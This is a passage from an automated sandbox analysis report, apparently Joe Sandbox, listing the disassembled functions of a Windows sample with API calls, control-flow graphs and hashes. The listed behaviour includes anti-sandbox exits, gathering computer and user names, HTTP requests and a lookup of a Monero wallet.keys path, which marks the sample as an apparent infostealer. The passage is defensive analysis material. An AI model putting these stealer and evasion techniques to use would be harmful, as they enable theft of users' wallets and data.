                                  • CloseHandle.KERNEL32(?,00000000,?,01409D30,?,00BC110C,?,00000000,?,00BC1110,?,00000000,00BC0AEF), ref: 00BB6B1A
                                  • ExitProcess.KERNEL32 ref: 00BB6B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 0b706494cf7966cbb54327d82c5672bbb0e640e548bb9a5460049d7910ce55f0
                                  • Instruction ID: 9cb356491868d832aa3acef5e7c588e1de6b24b8d825fb6b3c17a6fd054fa7bf
                                  • Opcode Fuzzy Hash: 0b706494cf7966cbb54327d82c5672bbb0e640e548bb9a5460049d7910ce55f0
                                  • Instruction Fuzzy Hash: B0312870D04209ABDB04FBE4DC96BFE77B8AF04300F504598F212B6192EFB46905C6A2
                                  Function 00BA1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 ba1220-ba1247 call bb89b0 GlobalMemoryStatusEx 1439 ba1249-ba1271 call bbda00 * 2 1436->1439 1440 ba1273-ba127a 1436->1440 1442 ba1281-ba1285 1439->1442 1440->1442 1444 ba129a-ba129d 1442->1444 1445 ba1287 1442->1445 1447 ba1289-ba1290 1445->1447 1448 ba1292-ba1294 ExitProcess 1445->1448 1447->1444 1447->1448
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BA123E
                                  • __aulldiv.LIBCMT ref: 00BA1258
                                  • __aulldiv.LIBCMT ref: 00BA1266
                                  • ExitProcess.KERNEL32 ref: 00BA1294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 3e5d1f91bb1899be6e9434829c64072e296a3cdc13c77adc01ed5c9379c0e492
                                  • Instruction ID: 0704543641d70a4fd07931903923bc01024fa7ea1860a153fae5e92ac7f6feac
                                  • Opcode Fuzzy Hash: 3e5d1f91bb1899be6e9434829c64072e296a3cdc13c77adc01ed5c9379c0e492
                                  • Instruction Fuzzy Hash: 810112B0D44308BBEF50EFD8CC89BADBBB8EB15705F248494E705BA2C0D7B495458B99
                                  Function 00BB6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1450 bb6af3 1451 bb6b0a 1450->1451 1453 bb6aba-bb6ad7 call bbaad0 OpenEventA 1451->1453 1454 bb6b0c-bb6b22 call bb6920 call bb5b10 CloseHandle ExitProcess 1451->1454 1460 bb6ad9-bb6af1 call bbaad0 CreateEventA 1453->1460 1461 bb6af5-bb6b04 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01409D30,?,00BC110C,?,00000000,?,00BC1110,?,00000000,00BC0AEF), ref: 00BB6ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB6AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB6AF9
                                  • Sleep.KERNEL32(00001770), ref: 00BB6B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01409D30,?,00BC110C,?,00000000,?,00BC1110,?,00000000,00BC0AEF), ref: 00BB6B1A
                                  • ExitProcess.KERNEL32 ref: 00BB6B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: ba1e562faf1a75ba2ac364b37aa8ca0b3b87afd7174f87982f1a9953065d19f7
                                  • Instruction ID: cbbedf09e134e09f353189add4dfbb3979bbee9f2b720173a274969b13f3da47
                                  • Opcode Fuzzy Hash: ba1e562faf1a75ba2ac364b37aa8ca0b3b87afd7174f87982f1a9953065d19f7
                                  • Instruction Fuzzy Hash: 0FF0DA7094031AAFEB20BBA09C86BFD7BB4EB04701F104595B512E5291DBF46940D6A6
                                  Function 00BA47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 5791d414862abea404d4ec27454b95788f2bafd91b32419e9c97506bb2830d22
                                  • Instruction ID: 6f09c97187468cff49feb6409bf5899ba354e0846e9b5b173d8a5e76663aa207
                                  • Opcode Fuzzy Hash: 5791d414862abea404d4ec27454b95788f2bafd91b32419e9c97506bb2830d22
                                  • Instruction Fuzzy Hash: BA211FB1D00209ABDF14EFA4E845AED7B74FB45320F108625F955BB2D0DB706A09CF91
                                  Function 00BB51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA6280: InternetOpenA.WININET(00BC0DFE,00000001,00000000,00000000,00000000), ref: 00BA62E1
                                    • Part of subcall function 00BA6280: StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA6303
                                    • Part of subcall function 00BA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6335
                                    • Part of subcall function 00BA6280: HttpOpenRequestA.WININET(00000000,GET,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA6385
                                    • Part of subcall function 00BA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA63BF
                                    • Part of subcall function 00BA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA63D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 3eed64c6bf0eaab0a9ef5d528582344489fc597f6f7741aa6a134d6edaa7f1e0
                                  • Instruction ID: a8a4d399560d4d6e711235878c1e44dabf26bb8d506ebecb79d40c396e7fbb82
                                  • Opcode Fuzzy Hash: 3eed64c6bf0eaab0a9ef5d528582344489fc597f6f7741aa6a134d6edaa7f1e0
                                  • Instruction Fuzzy Hash: CC11FE70D14148BBDB14FF64DD92AFD77B8AF50300F404598F91A6A592EFB0AB05C6A2
                                  Function 00BA1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BA112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BA1132
                                  • ExitProcess.KERNEL32 ref: 00BA1143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: a02972a5e7a9afffe503007dea6ce09fe0a600c3609430746b9716e013e063e0
                                  • Instruction ID: c89dd2fb689869d918338c8b74c30d4fc533d4bc7aaa31dc738cb6ef733beb5b
                                  • Opcode Fuzzy Hash: a02972a5e7a9afffe503007dea6ce09fe0a600c3609430746b9716e013e063e0
                                  • Instruction Fuzzy Hash: A0E08670949348FFE750BBA89C4AB087AB8EB04B01F104084F708BA2C0D6B4360096A9
                                  Function 00BA10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BA10B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BA10F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: ee10474615a619198e5a174bebcb311f6af5d3b76b44cf8abf500832e7de3a92
                                  • Instruction ID: 1bab7abd49234839ba70d772289547a0a2beae9015d800a32fc9a14fa0b84fe0
                                  • Opcode Fuzzy Hash: ee10474615a619198e5a174bebcb311f6af5d3b76b44cf8abf500832e7de3a92
                                  • Instruction Fuzzy Hash: 1EF0E971641304BBE714A6A89C89FBAB7ECD705715F301844F544E7280D5716E00CAA0
                                  Function 00BA1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7910
                                    • Part of subcall function 00BB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7917
                                    • Part of subcall function 00BB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BB792F
                                    • Part of subcall function 00BB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7880
                                    • Part of subcall function 00BB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7887
                                    • Part of subcall function 00BB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB789F
                                  • ExitProcess.KERNEL32 ref: 00BA11C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: ac97049e5ef86f76481eece99d5ae9935b867d1699f17001b2906201fae1d8d0
                                  • Instruction ID: de03f6074eef25330277015b70a1feee6b5614698417c66c053a91b2ec5ee5ab
                                  • Opcode Fuzzy Hash: ac97049e5ef86f76481eece99d5ae9935b867d1699f17001b2906201fae1d8d0
                                  • Instruction Fuzzy Hash: DEE012B595430253CA0073BAAC4AB7A37DC9B55385F0408A8FA09E6202FE65F801C576

                                  Non-executed Functions

                                  Function 00BB38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB38CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB38E3
                                  • lstrcat.KERNEL32(?,?), ref: 00BB3935
                                  • StrCmpCA.SHLWAPI(?,00BC0F70), ref: 00BB3947
                                  • StrCmpCA.SHLWAPI(?,00BC0F74), ref: 00BB395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB3C67
                                  • FindClose.KERNEL32(000000FF), ref: 00BB3C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 032abf00597f153983981e2cba6acddafc6b2f0337b69438b18147e0bd4ab9a6
                                  • Instruction ID: 3979ea2be40aa8d59ad60199ad445ba2ea94e0d835f281862c643eb46a7ed4c6
                                  • Opcode Fuzzy Hash: 032abf00597f153983981e2cba6acddafc6b2f0337b69438b18147e0bd4ab9a6
                                  • Instruction Fuzzy Hash: C5A12EB1900259ABDB24EFA4DC85FFE77B8EB49700F0445C8A50D96141EB75AB84CF62
                                  Function 00BABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00BC0B32,00BC0B2B,00000000,?,?,?,00BC13F4,00BC0B2A), ref: 00BABEF5
                                  • StrCmpCA.SHLWAPI(?,00BC13F8), ref: 00BABF4D
                                  • StrCmpCA.SHLWAPI(?,00BC13FC), ref: 00BABF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAC7BF
                                  • FindClose.KERNEL32(000000FF), ref: 00BAC7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
